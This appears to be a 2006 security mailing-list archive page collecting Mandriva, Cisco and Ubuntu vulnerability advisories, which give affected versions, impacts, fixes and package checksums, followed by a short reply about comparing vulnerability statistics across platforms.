x86_64/2006.0/SRPMS/ppp-2.4.3-9.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEswtAmqjQ0CJFipgRAjifAKDKvH8Gv/mS+pooTMJbQb7KN3Di7wCg9pmY F1TbQTxk905x7K8bqg0ddi0= =y43d -END PGP SIGNATURE-
Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration Document ID: 70650 Advisory ID: cisco-sa-20060712-crws http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml Revision 1.0 For Public Release 2006 July 12 1600 UTC (GMT) - --- Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - --- Summary === The default Cisco IOS configuration shipped with the Cisco Router Web Setup (CRWS) application allows the execution of commands at privilege level 15 through the Cisco IOS HTTP (Hypertext Transfer Protocol) server web interface without requiring authentication credentials. Privilege level 15 is the highest privilege level on Cisco IOS? devices. Fixed versions of the CRWS application have been modified by Cisco to provide a more secure default IOS configuration and additional functionality with regards to the Cisco IOS HTTP server web interface. This issue does not require a Cisco IOS software upgrade or a CRWS software upgrade. Customers who decide to upgrade to a fixed version of CRWS and deploy the new default IOS configuration will not need to deploy the suggested workarounds. Customers who elect NOT to upgrade to a fixed CRWS version, or customers upgrading to a fixed CRWS version who keep their existing configuration should implement the workarounds identified in this advisory. Additional information on the new default IOS configuration shipped with the CRWS application is available in the Details section of this advisory. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml. Affected Products = Vulnerable Products +-- The following Cisco routers whose configurations have been based on the default IOS configuration shipped with any version of CRWS prior to version 3.3.0 build 31 may be affected by this vulnerability: * Cisco 806 * Cisco 826 * Cisco 827 * Cisco 827H * Cisco 827-4v * Cisco 828 * Cisco 831 * Cisco 836 * Cisco 837 * Cisco SOHO 71 * Cisco SOHO 76 * Cisco SOHO 77 * Cisco SOHO 77H * Cisco SOHO 78 * Cisco SOHO 91 * Cisco SOHO 96 * Cisco SOHO 97 Products Confirmed Not Vulnerable + Any of the previously listed Cisco routers whose IOS configuration is not based on the default IOS configuration shipped with the CRWS application are not vulnerable. No other Cisco products are currently known to be affected by this vulnerability. Details === The Cisco Router Web Setup tool (CRWS) provides a graphical user interface (GUI) for configuring Cisco SOHO and Cisco 800 series routers, and allows users to set up their routers quickly and easily. The GUI is accessed through the Cisco IOS HTTP server, which is enabled on the default IOS configuration shipped with the CRWS application. The Cisco IOS HTTP server uses the "enable password" (assuming one has been configured) as its default authentication mechanism. Other authentication mechanisms can be configured, including the use of a local user database, an external RADIUS (Remote Authentication Dial In User Service) or an external TACACS+ (Terminal Access Controller Access Control System) server. The default IOS configuration shipped with the CRWS application does not include an "enable password" or an "enable secret" command, allowing access to the Cisco IOS HTTP server interface at any privilege level, up to and including privilege level 15, without providing authentication credentials. Privilege level 15 is the highest privilege level on Cisco IOS devices. To resolve this vulnerability, Cisco has made changes to the default IOS configuration shipped with the CRWS application and to the CRWS application itself. Those changes are as follows: * The addition of a default username and password combination to be used during initial device configuration. Note: CRWS will prompt the user to change those default credentials during its first invocation. It is strongly recommended for customers to remove those default credentials from the device configuration by using the Cisco IOS CLI (command line interface) if not planning to use the CRWS application for device configuration. * The addition of an authentication mechanism for the Cisco IOS HTTP server to authenticate users based on the local user database. * The addition of an access restriction to only allow connections to the Cisco IOS HTTP server from the internal network, using the addressi
Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities Advisory ID: cisco-sa-20060712-cucm http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml Revision 1.0 For Public Release 2006 July 12 1600 UTC (GMT) - - Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - - Summary === Cisco Unified CallManager (CUCM) 5.0 has Command Line Interface (CLI) and Session Initiation Protocol (SIP) related vulnerabilities. There are potential privilege escalation vulnerabilities in the CLI which may allow an authenticated administrator to access the base operating system with root privileges. There is also a buffer overflow vulnerability in the processing of hostnames contained in a SIP request which may result in arbitrary code execution or cause a denial of service. These vulnerabilities only affect Cisco Unified CallManager 5.0. Cisco has made free software available to address these vulnerabilities for affected customers. There are no workarounds available to mitigate the effects of these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml Affected Products = Vulnerable Products +-- Only Cisco Unified CallManager versions 5.0(1), 5.0(2), 5.0(3) and 5.0(3a) are affected. The version of CallManager software running can be determined navigating to Show > Software in the CUCM IPT Platform administration interface or by running the command show version active in the CLI. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities, including all previous versions of Cisco Unified CallManager. Details === Cisco Unified CallManager is the software-based call-processing component of the Cisco IP telephony solution which extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CallManager CLI provides a backup management interface to the system in order to diagnose and troubleshoot the primary HTTPS-based management interfaces. The CLI, which runs as the root user, contains two vulnerabilities in the parsing of commands. The first vulnerability may allow an authenticated CUCM administrator to execute arbitrary operating system programs as the root user. The second vulnerability may allow output redirection of a command to a file or a folder specified on the command line. Cisco Unified CallManager supports the coexistence of both SCCP and SIP phones, allowing for migration to SIP while protecting investments in existing devices. CUCM contains a buffer overflow vulnerability in the processing of excessively long hostnames which may be included in a SIP request. These issues are documented by the following Cisco bug IDs: * CSCse11005 ( registered customers only) Certain CLI commands allow execution of arbitrary Linux commands * CSCse31704 ( registered customers only) User able to redirect command output to a file folder * CSCsd96542 ( registered customers only) SD-GA: CCM cores when SIP request line host name has ASCII overflow Impact == Successful exploitation of the CLI vulnerability documented in Cisco bug ID CSCse11005 may allow authenticated CLI users to execute arbitrary operating system commands with root privileges. Exploitation of the CLI vulnerability documented in Cisco bug ID CSCse31704 may allow an authenticated CLI user to modify or overwrite any file on the filesystem as the root user. Exploitation of the SIP vulnerability documented in Cisco bug ID CSCsd96542 may result in arbitrary code execution or a denial of service. Software Version and Fixes == When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance. Workarounds === There are no workarounds for these vulnerabilities. Obtaining Fixed Software Cisco will make free software available to
[USN-315-1] libmms, xine-lib vulnerabilities
=== Ubuntu Security Notice USN-315-1 July 12, 2006 libmms, xine-lib vulnerabilities === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libxine1 1.0-1ubuntu3.8 Ubuntu 5.10: libmms0 0.1-0ubuntu1.2 libxine1c2 1.0.1-1ubuntu10.4 Ubuntu 6.06 LTS: libxine-main11.1.1+ubuntu2-7.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Matthias Hopf discovered several buffer overflows in libmms. By tricking a user into opening a specially crafted remote multimedia stream with an application using libmms, a remote attacker could exploit this to execute arbitrary code with the user's privileges. The Xine library contains an embedded copy of libmms, and thus needs the same security update. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.diff.gz Size/MD5: 5811 6a41fae784ef1516888d20a8ec08c663 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.dsc Size/MD5: 1070 9880832522e9ec56d035abe93b4e2471 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.orig.tar.gz Size/MD5: 7384258 96e5195c366064e7778af44c3e71f43a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_amd64.deb Size/MD5: 106922 2b8375b1f380d86fcf366a18d1f3b902 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_amd64.deb Size/MD5: 3567630 d752e90e7d26650aea95d367dcf84790 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_i386.deb Size/MD5: 106932 d95e46c206ca84e80a98e01ad404ef71 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_i386.deb Size/MD5: 3750548 743fae494abdd778263762de0100a7c9 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_powerpc.deb Size/MD5: 106944 2719a6a92c6e4cbbbd884ecdbfe7122e http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_powerpc.deb Size/MD5: 3925764 979cd9f6ba73ae35cdce5a965f3068a9 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.diff.gz Size/MD5: 5750 26bc4a3aa10f4c803fa97f9544ecd0bc http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.dsc Size/MD5: 607 592210915bc702a6d9e94ecfe0711fa7 http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1.orig.tar.gz Size/MD5: 317089 ebd88537af9875265e41ee65603ecd1a http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.diff.gz Size/MD5:10600 1e73a41d99fb1fb4b2eddb43895caeac http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.dsc Size/MD5: 1189 9f04d287f5ba301eaf6fd2f9e066e3ae http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz Size/MD5: 7774954 9be804b337c6c3a2e202c5a7237cb0f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_amd64.deb Size/MD5:19984 21d4c0a07f60aeb1550f198722d9ec99 http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_amd64.deb Size/MD5:16360 bf82acc8e708dbf4605fb6be016e0e40 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_amd64.deb Size/MD5: 108948 92beceb19f7806a47992ca8d6fcb5c9c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.4_amd64.deb Size/MD5: 3611402 24bcea7ae2e5a4b5776213fd551851f8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_i386.deb Size/MD5:18312 bbe36a4ac6b616c24be2c7417a44bf26 http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_i386.deb Size/MD5:15116 0ed843f14b406370a7a2426ba5c8f459 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_i386.deb Size/MD5: 108956 2c9357c05d883747cb7c1c8218e7a257 http://security.ubuntu.com/ubuntu/pool/main/x/xine
[USN-316-1] installer vulnerability
=== Ubuntu Security Notice USN-316-1 July 12, 2006 Installer vulnerability https://launchpad.net/bugs/48350 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: passwd 1:4.0.13-7ubuntu3.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Iwan Pieterse discovered that, if you select "Go Back" at the final message displayed by the alternate or server CD installer ("Installation complete") and then continue with the installation from the installer's main menu, the root password is left blank rather than locked. This was due to an error while clearing out the root password from the installer's memory to avoid possible information leaks. Installations from the alternate or server CDs when the user selected "Continue" when the "Installation complete" message was first displayed are not affected by this bug. Installations from the desktop CD are not affected by this bug at all. When you upgrade your passwd package to the newest version, it will detect this condition and lock the root password if it was previously blank. The next point release of Ubuntu 6.06 LTS will include a corrected installer. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.diff.gz Size/MD5: 204800 1b29e1615364944d98ea95498d6058b8 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.dsc Size/MD5: 885 8ccf50d026fa2c4cffe85330f0d0985a http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13.orig.tar.gz Size/MD5: 1622557 034fab52e187e63cb52f153bb7f304c8 http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.dsc Size/MD5: 678 544762def71fb062b6d6f5484a4d7c45 http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.tar.gz Size/MD5:98334 f8d648ce6a9a007740b0e175b92385eb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup-udeb_1.1ubuntu4_all.udeb Size/MD5:79418 4ec2af1d5e09f129d486c142575f4081 http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4_all.deb Size/MD5: 161864 bc876d6099a323cebd2ffc94df41db06 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_amd64.deb Size/MD5: 249450 bfdba1450cbe14f6c71f5d9dee5df9b3 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_amd64.deb Size/MD5: 683510 547ad48ac45f6f11cacbd268f42b152a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_i386.deb Size/MD5: 240938 8500a4c2ab53f11b3fb8cb7fb4e00c78 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_i386.deb Size/MD5: 616346 a29d90e0ae7c7c70cbeffcbfba6bf04e powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_powerpc.deb Size/MD5: 251380 bd408187e20f19222e2b4fefe8706552 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_powerpc.deb Size/MD5: 665158 4975fe8598b4a8adc98fabcee1b4cb8e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_sparc.deb Size/MD5: 239930 85dde4bfa6d09491338f70efe9d6d336 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_sparc.deb Size/MD5: 620124 b0fcdadde2568b1a8324e2500718a18b signature.asc Description: Digital signature
[USN-313-1] OpenOffice.org vulnerabilities
=== Ubuntu Security Notice USN-313-1 July 11, 2006 openoffice.org-amd64, openoffice.org vulnerabilities CVE-2006-2198, CVE-2006-2199, CVE-2006-3117 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: openoffice.org-bin1.1.3-8ubuntu2.4 Ubuntu 6.06 LTS: openoffice.org-base 2.0.2-2ubuntu12.1 openoffice.org-common 2.0.2-2ubuntu12.1 openoffice.org-core 2.0.2-2ubuntu12.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Ubuntu 5.10 is also affected by these flaws. Updated packages will be provided shortly. Details follow: It was possible to embed Basic macros in documents in a way that OpenOffice.org would not ask for confirmation about executing them. By tricking a user into opening a malicious document, this could be exploited to run arbitrary Basic code (including local file access and modification) with the user's privileges. (CVE-2006-2198) A flaw was discovered in the Java sandbox which allowed Java applets to break out of the sandbox and execute code without restrictions. By tricking a user into opening a malicious document, this could be exploited to run arbitrary code with the user's privileges. This update disables Java applets for OpenOffice.org, since it is not generally possible to guarantee the sandbox restrictions. (CVE-2006-2199) A buffer overflow has been found in the XML parser. By tricking a user into opening a specially crafted XML file with OpenOffice.org, this could be exploited to execute arbitrary code with the user's privileges. (CVE-2006-3117) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.diff.gz Size/MD5:28789 514ea84d6f71ccf9db3ef260d5208659 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.dsc Size/MD5: 711 b1b158d017923995de9baa90d78af405 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4.orig.tar.gz Size/MD5: 213206527 dc7f27c5ce697aeca39f8622e19d8b81 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.diff.gz Size/MD5: 6775773 452a4984ad6e9099c90e535d4b8450e0 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.dsc Size/MD5: 2970 fe922d379fc59ff63aa1f138bdd623d5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3.orig.tar.gz Size/MD5: 166568714 5250574bad9906b38ce032d04b765772 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-af_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2635378 b8fa9808c55979fb401b5e54712790d5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ar_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2680962 9b14a2caeb1198c5754c04f81f53281b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ca_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2678222 98170fad141dd06f8126450c3aebcbee http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cs_1.1.3-8ubuntu2.4_all.deb Size/MD5: 3575066 d207819f21a982a4125a3199b14684cd http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cy_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2649914 bb4c611d7ed3323d48aa5dc29318f6b8 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-da_1.1.3-8ubuntu2.4_all.deb Size/MD5: 3568972 e75a586b586e765d07e6e82723613f8f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-de_1.1.3-8ubuntu2.4_all.deb Size/MD5: 3441302 574d06d219935433da8fc72faaa854e3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-el_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2729146 058e25d98f3d4f2d1b02bbfbbf030319 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-en_1.1.3-8ubuntu2.4_all.deb Size/MD5: 3513912 6b6e6689293d2f1a6c31c7dbae8606a5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-es_1.1.3-8ubuntu2.4_all.deb Size/MD5: 3548974 9f8c29a74cd142b9f47d06bc79830653 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-et_1.1.3-8ubuntu2.4_all.deb Size/MD5: 2632886 66825e4ed7f75cb77c1f2f8ded32acc2 http://security.ubuntu.com/ubuntu/pool/main/o/openof
Re: LAMP vs Microsoft
Researcher "fads," differences in vendor disclosure practices, and vulnerability database editorial policies will heavily influence vulnerability statistics, to the point where comparing them is not very informative (at least, you're not getting the whole picture). You also have the challenge of defining equivalent platforms to compare against each other. However, there is one area where you can really compare 2 products to each other: implementation of standards. These standards could be protocol-based, file-based (e.g. image formats), or scheme-based (such as authentication or crypto schemes). It would be great to see some more focused efforts that are based on standards that are implemented in a cross-OS fashion. This would allow the community to harness the power of fuzzing and suite-testing in a narrow fashion. We would only get narrow answers, of course - "these kinds of implementation bugs were looked for and found on these kinds of products" - but it would be much more manageable and measurable, and above all, we would be comparing apples to apples. If someone is interested in pursuing this further, you could probably start with past data from PROTOS and other past fuzzing/suite-testing results. - Steve